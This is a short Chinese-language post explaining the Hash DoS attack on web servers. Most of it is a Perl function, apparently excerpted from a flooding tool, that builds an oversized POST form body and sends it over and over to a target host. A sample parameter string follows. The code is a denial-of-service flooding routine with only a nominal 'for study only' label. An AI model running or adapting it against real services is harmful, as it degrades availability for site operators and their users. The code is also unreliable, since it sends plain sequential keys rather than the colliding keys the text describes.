Hash Dos利用了各种语言中Hash算法非随机性,可以制造很多不一样的value,但是key的数据一样,然后让Hash表成为了单向链表,导致服务运行性能下降
可以通过两个拥有同一hash key的字符串构造更多这样的值。在攻击时,将这些数据做成一个HTTP POST表单,然后写一个循环的程序,不停提交这个表单。
下面这段函数摘自httpflooder(仅供学习):
sub hash_dos {
my ($opt, $stats, $reads, $num, $thread) = @_;
my $body = “a=b”;
foreach (1 .. $opt->{interval}) {
$body .= “&a$_=b$_”;
}
foreach my $r (1 .. $num) {
my $ip = $reads->{ips}->[$stats->{ccount} % $reads->{ip_count}];
my $socket = &_get_socket($opt,$ip);
# … For stats
$stats->{ip}->{$ip}++;
my ($url, $uagent, $ref) = &_reads_count($opt,$reads);
my $req = “POST $url HTTP/1.1\r\n”;
$req .= “Host: $opt->{host}\r\n”;
$req .= “Authorization: Basic $opt->{basicauth}\r\n” if $opt->{basicauth};
$req .= “Connection: Keep-Alive\r\n” if $opt->{keepalive};
$req .= “Cookie: $opt->{cookie}\r\n” if $opt->{cookie};
$req .= “User-Agent: $uagent\r\n” if $uagent;
$req .= “Referer: $ref\r\n” if $ref;
$req .= “Content-Length: “.length($body).”\r\n”;
$req .= “\r\n”;
$req .= “$body\r\n”;
print($socket $req);
sysread($socket, my $msg, 12);
$socket->close();
my $rcode = &_parse_code($stats,$msg);
$stats->{ccount}++;
&_logger($opt,$ip,$thread,$req,$rcode,$msg,$stats->{ccount}) if $opt->{verbose};
}
}
比如cookie哈希会变成这样:
cookie=”a=b&a1=b1&a2=b2&a3=b3&a4=b4&a5=b5&a6=b6&a7=b7&a8=b8&a9=b9&a10=b10&a11=b11&a12=b12&a13=b13&a14=b14&a15=b15&a16=b1
6&a17=b17&a18=b18&a19=b19&a20=b20&a21=b21&a22=b22&a23=b23&a24=b24&a25=b25&a26=b26&a27=b27&a28=b28&a29=b29&a30=b30&a31=b
31&a32=b32&a33=b33&a34=b34&a35=b35&a36=b36&a37=b37&a38=b38&a39=b39&a40=b40&a41=b41&a42=b42&a43=b43&a44=b44&a45=b45&a46=
b46&a47=b47&a48=b48&a49=b49&a50=b50&a51=b51&a52=b52&a53=b53&a54=b54&a55=b55&a56=b56&a57=b57&a58=b58&a59=b59&a60=b60″
